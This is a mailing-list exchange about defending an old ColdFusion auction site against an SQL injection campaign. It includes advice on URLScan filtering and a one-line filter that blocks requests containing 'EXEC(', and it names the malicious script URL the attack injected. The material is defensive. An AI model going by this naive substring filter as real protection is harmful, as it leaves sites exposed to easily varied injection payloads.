Hi Dave,
I have an older cf auction application that is being hit with this attack. I'm
running URLScan on my win2k server running CF5 server w/ sql2k. What is the max
length of URL you would recommend? Any deny verbs, headers, etc you would
recommend so I can compare to my urlscan.ini. I added the script below posted
on this list to my application.cfm but I think it might need to go into the
aps-global.cfm...
>>Even easier than monkeying with every single one of your cfquery's....
>just add following line to the TOP of all your application.cfm's:
><cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC("
>OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
Thanks,
Martin
>> The hacker's hope is that you will be outputting one of those
>
>For what it's worth, the specific URL that was injected in the sample I saw
>(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
>doesn't resolve.
>
>Second, if you can restore a previous copy of the database, that might be
>easier.
>
>Also, I'd recommend that you identify the problem scripts that contain the
>vulnerability before you restore the database. Otherwise, you might have to
>repeat the process.
>
>Finally, you might consider implementing filtering at the web server to
>block long (and presumably problematic) URLs before they're even sent to CF.
>If you're using IIS, you can do that with the latest version of URLScan. If
>you're using Apache, I think mod_security will let you do this.
>
>Dave Watts, CTO, Fig Leaf Software
>http://www.figleaf.com/
>
>Fig Leaf Software provides the highest caliber vendor-authorized
>instruction at our training centers in Washington DC, Atlanta,
>Chicago, Baltimore, Northern Virginia, or on-site at your location.
>Visit http://training.figleaf.com/ for more information!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309543
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
